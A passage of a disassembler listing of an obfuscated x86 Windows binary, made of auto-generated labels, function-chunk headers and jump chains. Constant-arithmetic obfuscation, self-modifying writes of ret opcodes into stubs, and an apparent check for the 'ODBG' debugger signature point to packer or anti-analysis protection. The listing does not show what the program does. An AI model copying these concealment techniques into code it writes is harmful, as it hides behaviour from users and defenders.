sub_4456C9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4456E1: ; CODE XREF: sub_439BF8+12CBEj
jmp sub_43F058
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_4456E6: ; CODE XREF: sub_4406F1:loc_4450D6j
lea eax, nullsub_24
mov byte ptr [eax], 0C3h
jmp nullsub_24
; END OF FUNCTION CHUNK FOR sub_4406F1
; =============== S U B R O U T I N E =======================================
sub_4456F4 proc near ; DATA XREF: .data:off_427968o
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A007 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043C3F1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D384 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444477 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044538B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00445CA6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004481B9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C339 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B8F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004540F9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458528 SIZE 00000005 BYTES
push esi
mov esi, edi
call sub_4433B9
loc_4456FC: ; DATA XREF: sub_43A90F+1D58Ao
xchg eax, [esp+4+var_4]
mov ebp, eax
pop eax
push 0B0E089B6h
xchg edx, [esp+4+var_4]
jmp loc_43A007
sub_4456F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44570F: ; CODE XREF: ut7h7i2x:loc_4455CBj
mov eax, [eax]
call sub_43A2F5
; START OF FUNCTION CHUNK FOR sub_43A556
loc_445716: ; CODE XREF: sub_43A556+4C39j
pop ebp
xchg ebx, [esp+0]
mov ebp, ebx
pop ebx
retn 4
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_445720: ; CODE XREF: sub_452D3D+34E7j
jmp nullsub_264
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_445725: ; CODE XREF: sub_449B8E-87D5j
jmp loc_458D37
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44572A: ; CODE XREF: sub_43AA94+C9j
jmp sub_4545B1
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_44572F: ; CODE XREF: sub_44B68F-12387j
jmp loc_453039
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_445734: ; CODE XREF: sub_43C1D2+8j
; sub_45114D+6j ...
mov edx, [esp+0]
call sub_4444F0
loc_44573C: ; CODE XREF: sub_43B83C:loc_459C62j
jz loc_44E2FF
jmp loc_458E7D
; END OF FUNCTION CHUNK FOR sub_43C1D2
; ---------------------------------------------------------------------------
loc_445747: ; CODE XREF: ut7h7i2x:00454D97j
shl esi, 0Eh
; START OF FUNCTION CHUNK FOR sub_445E9E
loc_44574A: ; CODE XREF: sub_445E9E:loc_454D82j
sub eax, 731B432Dh
xor eax, 0A0C82487h
add eax, ebp
add eax, 1C0868B7h
jmp loc_440569
; END OF FUNCTION CHUNK FOR sub_445E9E
; ---------------------------------------------------------------------------
test al, al
jz loc_4406D4
jmp loc_44C1B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_445770: ; CODE XREF: sub_44445F:loc_455F5Fj
; ut7h7i2x:00455F78j
add edi, 0FACF93CBh
xchg edi, [esp+8+var_8]
jmp sub_44E835
; END OF FUNCTION CHUNK FOR sub_44445F
; =============== S U B R O U T I N E =======================================
sub_44577E proc near ; CODE XREF: ut7h7i2x:00439005p
; ut7h7i2x:004471F0j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004408A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044923C SIZE 00000015 BYTES
xchg eax, [esp+0]
pop eax
mov edx, [eax]
mov al, 1
jmp loc_4408A1
sub_44577E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push edx
shl esi, 1
jmp sub_43F82A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_445793: ; CODE XREF: sub_4455F4:loc_4487DDj
pop ebp
xchg ecx, esi
jmp loc_43E54F
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
jo loc_4510A5
jmp loc_441C69
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A0CE
loc_4457A6: ; CODE XREF: sub_44A0CE:loc_43F77Aj
add eax, 0C7A240h
popf
xchg eax, [esp-8+arg_4]
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_44A0CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CED
loc_4457B5: ; CODE XREF: sub_448CED-4B7Bj
jnz loc_43B38D
; END OF FUNCTION CHUNK FOR sub_448CED
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_4457BB: ; CODE XREF: sub_4489DF+1Ej
jmp loc_45268B
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_4457C0: ; CODE XREF: sub_44E5DC-AFD2j
jmp nullsub_322
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
add esi, ecx
jmp loc_43B386
; ---------------------------------------------------------------------------
loc_4457CC: ; CODE XREF: ut7h7i2x:0044BA7Dj
xchg edx, [esp]
mov ebp, esp
call sub_4411BF
; START OF FUNCTION CHUNK FOR sub_45941F
loc_4457D6: ; CODE XREF: sub_45941F+3j
jmp loc_44B871
; END OF FUNCTION CHUNK FOR sub_45941F
; ---------------------------------------------------------------------------
loc_4457DB: ; CODE XREF: ut7h7i2x:0044A909j
jmp loc_44E54F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_4457E0: ; CODE XREF: sub_43AED9+1C50Fj
jp loc_43EF79
loc_4457E6: ; CODE XREF: sub_43AED9:loc_4396B9j
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
lea eax, dword_456720
jmp loc_43AFF3
; END OF FUNCTION CHUNK FOR sub_43AED9
; =============== S U B R O U T I N E =======================================
sub_4457F7 proc near ; DATA XREF: sub_4522DD+25A9o
add eax, ebp
add eax, 53518C6Ch
mov eax, [eax]
add eax, eax
jmp loc_445550
sub_4457F7 endp
; ---------------------------------------------------------------------------
loc_445808: ; DATA XREF: sub_44670E+3o
mov al, [eax]
jns loc_447B8B
sub al, 99h
call sub_4555CE
; START OF FUNCTION CHUNK FOR sub_456111
loc_445817: ; CODE XREF: sub_456111+Cj
jmp loc_44D336
; END OF FUNCTION CHUNK FOR sub_456111
; ---------------------------------------------------------------------------
loc_44581C: ; CODE XREF: ut7h7i2x:00450E3Cj
jnp loc_452955
; =============== S U B R O U T I N E =======================================
sub_445822 proc near ; CODE XREF: ut7h7i2x:0045A1D2p
; FUNCTION CHUNK AT 0043A585 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459AB1 SIZE 0000000E BYTES
xchg edi, [esp+0]
pop edi
push edx
call sub_44A833
mov eax, 524E554Eh
call sub_43AA94
mov ds:dword_41D058, eax
jmp loc_43A585
sub_445822 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_445841: ; CODE XREF: sub_450FDE-ED3Aj
call sub_439701
loc_445846: ; CODE XREF: sub_455CF9+25E1j
jmp loc_43E585
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
loc_44584B: ; CODE XREF: ut7h7i2x:00441434j
jmp loc_43B437
; ---------------------------------------------------------------------------
add ebx, edx
jmp sub_456111
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_543. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FDAD
loc_445858: ; CODE XREF: sub_43FDAD+9j
jmp sub_4417AF
; END OF FUNCTION CHUNK FOR sub_43FDAD
; ---------------------------------------------------------------------------
locret_44585D: ; CODE XREF: ut7h7i2x:0044B2A0j
retn
; ---------------------------------------------------------------------------
loc_44585E: ; CODE XREF: ut7h7i2x:004560CBj
jmp loc_43E8B5
; ---------------------------------------------------------------------------
loc_445863: ; CODE XREF: ut7h7i2x:0043F46Ej
jmp sub_442E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_445868: ; CODE XREF: sub_449B8E-69Ej
xor edi, 2E247B59h
and edi, 0F40CB426h
add edi, 40414527h
xchg edi, [esp+0]
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_445882: ; CODE XREF: sub_4529E0:loc_443A92j
jz loc_439937
; END OF FUNCTION CHUNK FOR sub_4529E0
; START OF FUNCTION CHUNK FOR sub_445188
loc_445888: ; CODE XREF: sub_445188+E251j
jmp loc_4479EF
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
adc ebx, 46E21885h
jmp loc_439931
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448630
loc_445898: ; CODE XREF: sub_448630+Cj
push edi
push 0B45BE8E1h
pop edi
or edi, 91828C32h
jmp loc_448D49
; END OF FUNCTION CHUNK FOR sub_448630
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_4458AA: ; CODE XREF: sub_43CE34+17F2Dj
mov esi, 0FE604B9Dh
test ecx, edx
jmp loc_446137
; END OF FUNCTION CHUNK FOR sub_43CE34
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_535. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451F39
loc_4458B7: ; CODE XREF: sub_451F39:loc_43B583j
; ut7h7i2x:00456A04j
jmp loc_44B195
; END OF FUNCTION CHUNK FOR sub_451F39
; ---------------------------------------------------------------------------
loc_4458BC: ; CODE XREF: ut7h7i2x:0044DA36j
jmp locret_43BA98
; ---------------------------------------------------------------------------
loc_4458C1: ; CODE XREF: ut7h7i2x:0044511Fj
jmp locret_4408C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_4458C6: ; CODE XREF: sub_44602A-1C91j
jmp loc_4433EA
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444266
loc_4458CB: ; CODE XREF: sub_444266+7BC6j
xchg ebx, edx
pushf
jmp loc_444985
; END OF FUNCTION CHUNK FOR sub_444266
; ---------------------------------------------------------------------------
add esi, 6582A8ACh
jmp sub_43C0DA
; ---------------------------------------------------------------------------
loc_4458DE: ; CODE XREF: ut7h7i2x:004506AAj
jmp ds:dword_41D168
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov [ebx+5AFFFFCFh], ch
call sub_440358
; START OF FUNCTION CHUNK FOR sub_45633E
loc_4458F0: ; CODE XREF: sub_45633E-A8EFj
xchg esi, ecx
shl ebp, 10h
jmp loc_443921
; END OF FUNCTION CHUNK FOR sub_45633E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_416. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4458FB: ; CODE XREF: ut7h7i2x:0043E4F5j
or eax, edi
cdq
loc_4458FE: ; CODE XREF: ut7h7i2x:0043BC63j
or esi, 9A325FC3h
xor esi, 768936D9h
add esi, 12856F8Dh
xchg esi, [esp]
jmp sub_43F058
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_445918: ; CODE XREF: sub_455111-E83j
jnz loc_454E12
jmp loc_4488DB
; END OF FUNCTION CHUNK FOR sub_455111
; ---------------------------------------------------------------------------
or ecx, eax
jmp loc_43DC20
; ---------------------------------------------------------------------------
loc_44592A: ; CODE XREF: ut7h7i2x:loc_441313j
mov eax, [esp]
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_44592D: ; CODE XREF: sub_44B45E:loc_453AFFj
push edx
call sub_44C273
mov eax, 11E35Ch
call sub_43AA94
loc_44593D: ; CODE XREF: sub_4512E6+93FCj
mov ds:dword_41D128, eax
jmp loc_448367
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
loc_445948: ; CODE XREF: ut7h7i2x:loc_4531F9j
push 5A7D42F0h
pop eax
or eax, 46DBB841h
and eax, 0BA9AF7DAh
cmp eax, 0F06C031h
jmp loc_44798D
; ---------------------------------------------------------------------------
ja loc_45A97D
or ebp, edi
jmp loc_45366F
; ---------------------------------------------------------------------------
locret_445972: ; CODE XREF: ut7h7i2x:00454550j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E7A
loc_445973: ; CODE XREF: sub_459E7A-5283j
call sub_45967C
; END OF FUNCTION CHUNK FOR sub_459E7A
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_445978: ; CODE XREF: sub_43FCEE+40FEj
shl ebx, 0Dh
loc_44597B: ; CODE XREF: sub_43FCEE:loc_452DC7j
mov eax, [ebp-4]
push offset loc_43D1EC
jmp nullsub_153
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_445988: ; CODE XREF: sub_43AA94+1E5D7j
push 1E385637h
add ebx, 0FC7286C3h
add esi, eax
popf
loc_445996: ; CODE XREF: sub_43AA94:loc_44DA1Bj
push eax
mov eax, ebx
jmp loc_43EEC7
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
loc_44599E: ; CODE XREF: ut7h7i2x:loc_442E71j
mov ds:off_41D114, eax
lea eax, sub_445277
mov byte ptr [eax], 0C3h
jmp sub_445277
; =============== S U B R O U T I N E =======================================
sub_4459B2 proc near ; CODE XREF: sub_40D20A:loc_40D343p
; sub_4459B2:loc_459F25j
; DATA XREF: ...
; FUNCTION CHUNK AT 00459F25 SIZE 00000006 BYTES
call sub_459F30
jmp loc_459F25
sub_4459B2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_4459BC: ; CODE XREF: sub_44DD56-548Bj
jns loc_44C90C
sub ecx, ebp
and ecx, 0D37120F1h
test ebx, 0A963B355h
jmp loc_4395A8
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44928D
loc_4459D5: ; CODE XREF: sub_44928D:loc_450A70j
jz loc_44C513
xchg ebx, [edi]
xor edx, 0E7FC54D4h
; END OF FUNCTION CHUNK FOR sub_44928D
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_4459E3: ; CODE XREF: sub_43FF65+F4FFj
jle loc_44BB72
jmp loc_44E2F3
; END OF FUNCTION CHUNK FOR sub_43FF65
; =============== S U B R O U T I N E =======================================
sub_4459EE proc near ; CODE XREF: ut7h7i2x:0043E3C7j
; sub_4454EA+CCB8p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00439CF2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043A433 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E659 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F8ED SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F931 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004405D1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044069D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004418E7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00442611 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004429E3 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00443223 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444893 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444B43 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004450CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004477C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448EB1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449F4C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044CD0D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044E1B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E6E0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00451C64 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00451DA1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045210A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004522FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452A4E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0045480D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455034 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004550B2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004551E6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045591D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045618F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004568F2 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00457402 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004595B1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A36B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A649 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045AD2F SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
call sub_45292B
test al, al
jz loc_45A36B
jmp loc_45591D
sub_4459EE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_445A04 proc near ; CODE XREF: sub_455145-188B7p
; ut7h7i2x:00441B94j
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
add ecx, 0F02398E2h
xchg ecx, [esp-4+arg_0]
jmp loc_4399EA
sub_445A04 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jo loc_45389F
push 356589BDh
pop edx
loc_445A22: ; CODE XREF: ut7h7i2x:0043F2AFj
or edx, 7552DBC1h
and edx, 6B723DBCh
sub edx, 3EFC951Fh
jmp loc_43EF2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A5C0
loc_445A39: ; CODE XREF: sub_43A5C0:loc_45443Ej
jnz loc_43D93E
jmp loc_442484
; END OF FUNCTION CHUNK FOR sub_43A5C0
; ---------------------------------------------------------------------------
loc_445A44: ; CODE XREF: ut7h7i2x:0044F539j
xor edx, 0AADE5340h
adc edx, ebp
shr ecx, 2
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_445A4F: ; CODE XREF: sub_447EB5:loc_44F527j
add ebx, 0F231F78h
xchg ebx, [esp+4+var_4]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
loc_445A5D: ; DATA XREF: sub_44A833+6o
mov ebp, esp
call sub_449744
jmp locret_453888
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_445A69: ; CODE XREF: sub_43EF73+888Aj
jmp nullsub_329
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_445A6E: ; CODE XREF: sub_4431FF:loc_44B0DAj
jz loc_4592FE
jmp loc_45052E
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_445A79: ; CODE XREF: sub_44B5CF+5A0Aj
mov eax, ds:dword_43AF90
or eax, eax
jnz loc_4545CF
jmp loc_4549B5
; END OF FUNCTION CHUNK FOR sub_44B5CF
; =============== S U B R O U T I N E =======================================
sub_445A8C proc near ; CODE XREF: sub_456177-1B0FCp
; ut7h7i2x:004407F0j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044D206 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00452A15 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
xchg eax, [esp-4+arg_0]
push ecx
jmp loc_452A15
sub_445A8C endp
; =============== S U B R O U T I N E =======================================
sub_445A99 proc near ; DATA XREF: sub_448503+104B3o
; FUNCTION CHUNK AT 0045A82C SIZE 00000005 BYTES
add ebx, 3A8E7E73h
push offset sub_44DEDF
jmp loc_45A82C
sub_445A99 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_445AA9: ; CODE XREF: sub_44F495:loc_442E99j
jge loc_43D821
loc_445AAF: ; CODE XREF: sub_4558ED+10j
jmp loc_4494F5
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
ror ebx, 1Ch
shl ebp, 12h
jmp loc_45899D
; ---------------------------------------------------------------------------
loc_445ABF: ; CODE XREF: ut7h7i2x:loc_45971Cj
jnz loc_43CA12
jmp loc_43DA51
; ---------------------------------------------------------------------------
adc edx, eax
jmp sub_449B76
; =============== S U B R O U T I N E =======================================
sub_445AD1 proc near ; CODE XREF: ut7h7i2x:0043AF01j
; sub_43FCEE+14BEBp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439672 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00439E6B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043A393 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043D1AC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E65E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EDF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004409FE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440E7E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00442E88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444624 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044519B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004493D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ADC5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B521 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C5EC SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044C8DC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450534 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450F34 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00451B69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004535B0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454BD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A6A0 SIZE 00000005 BYTES
xchg ebx, [esp+4+var_4]
pop ebx
sub eax, 0B855B5C7h
rol eax, 8
xor eax, 0B3CADA89h
push ebx
push 86CB131Fh
pop ebx
jmp loc_4493D0
sub_445AD1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
not ebp
jmp loc_43B974
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446073
loc_445AF7: ; CODE XREF: sub_446073+13j
jz loc_45418A
call nullsub_19
loc_445B02: ; CODE XREF: ut7h7i2x:0045AA51j
jmp loc_43B626
; END OF FUNCTION CHUNK FOR sub_446073
; =============== S U B R O U T I N E =======================================
sub_445B07 proc near ; CODE XREF: sub_44ED9F+3j
var_128 = dword ptr -128h
; FUNCTION CHUNK AT 0044675B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004511FC SIZE 00000020 BYTES
add esp, 0FFFFFED8h
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
jmp loc_44675B
sub_445B07 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_445B1A: ; CODE XREF: sub_459B58:loc_459B63j
sub edx, ebx
test edx, 0E7620FD6h
jmp loc_43FD95
; END OF FUNCTION CHUNK FOR sub_459B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_445B27: ; CODE XREF: sub_43AB62+1EF81j
jz loc_446913
jmp loc_45911B
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_445B32: ; CODE XREF: ut7h7i2x:00439AE2j
xor edi, ebp
; =============== S U B R O U T I N E =======================================
sub_445B34 proc near ; CODE XREF: sub_44C595+Dp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00440073 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451C82 SIZE 0000000F BYTES
xchg eax, [esp+0]
pop eax
xchg edx, [esp-4+arg_0]
jmp loc_451C82
sub_445B34 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_445B40: ; CODE XREF: ut7h7i2x:004584BFj
add eax, 96B42FC2h
xor eax, 0F47D0277h
add eax, ebp
push edx
jmp loc_43B5E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_445B54: ; CODE XREF: sub_455807:loc_43CC1Bj
jnz loc_43B0B3
jmp loc_4425F7
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_445B5F: ; CODE XREF: sub_446599:loc_458C6Bj
push offset sub_43EF73
jmp nullsub_496
; END OF FUNCTION CHUNK FOR sub_446599
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_445B69: ; CODE XREF: sub_439701:loc_45158Aj
jge loc_442444
loc_445B6F: ; CODE XREF: sub_455775-16D71j
jmp loc_455DB6
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
xor eax, edx
mov [ebp+0], esi
jmp loc_442442
; ---------------------------------------------------------------------------
loc_445B7E: ; CODE XREF: ut7h7i2x:loc_43B81Aj
jnz loc_4415D9
jmp loc_43A3A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_445B89: ; CODE XREF: sub_43A556+FD1Cj
jge loc_448AE3
loc_445B8F: ; CODE XREF: sub_43B9B1:loc_4539BEj
lea eax, [ebp-25Ch]
cmp dword ptr [eax], 4742444Fh
jz loc_456EB1
jmp loc_445540
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_445BA6 proc near ; DATA XREF: sub_439BF8:loc_457282o
; FUNCTION CHUNK AT 0044D6B5 SIZE 00000005 BYTES
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
push offset loc_453946
jmp loc_44D6B5
sub_445BA6 endp
; =============== S U B R O U T I N E =======================================
sub_445BB7 proc near ; CODE XREF: ut7h7i2x:00447016p
; sub_43C0DA+DB25j
; FUNCTION CHUNK AT 00447A2C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455E7F SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
loc_445BBB: ; CODE XREF: ut7h7i2x:00450856j
push edx
pushf
push 0BFE3072Ah
pop edx
xor edx, 6BA28632h
add edx, 2C021544h
jmp loc_447A2C
sub_445BB7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_445BD4: ; CODE XREF: sub_43AA94:loc_43C934j
push 0CB2C6FD6h
xchg ecx, edi
test ebx, 3A3687DDh
jmp loc_446CD9
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
sub ebx, 0E7770F57h
jmp sub_444C53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4533DE
loc_445BF1: ; CODE XREF: sub_4533DE:loc_4558C2j
push eax
push 0FAAC1400h
pop eax
xor eax, 0D588F5D7h
rol eax, 0Ah
or eax, ds:4000F9h
jmp loc_44F4F4
; END OF FUNCTION CHUNK FOR sub_4533DE
; ---------------------------------------------------------------------------
locret_445C0C: ; CODE XREF: ut7h7i2x:loc_4469B4j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C5A
loc_445C0D: ; CODE XREF: sub_452C5A+7j
jmp sub_44F22A
; END OF FUNCTION CHUNK FOR sub_452C5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_445C12: ; CODE XREF: sub_449C6F+248Ej
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_449C6F
; ---------------------------------------------------------------------------
loc_445C17: ; CODE XREF: ut7h7i2x:0045160Cj
shl ebx, 1Eh
; START OF FUNCTION CHUNK FOR sub_449E96
loc_445C1A: ; CODE XREF: sub_449E96+774Cj
xor eax, 48F1B5FCh
and eax, 0BB45166h
xor eax, 694D992h
add eax, ebp
add eax, 0FA7F6628h
jmp loc_44210C
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_445C39: ; CODE XREF: sub_442B3B+9E85j
pop edx
add eax, 58D93267h
jb loc_451BC8
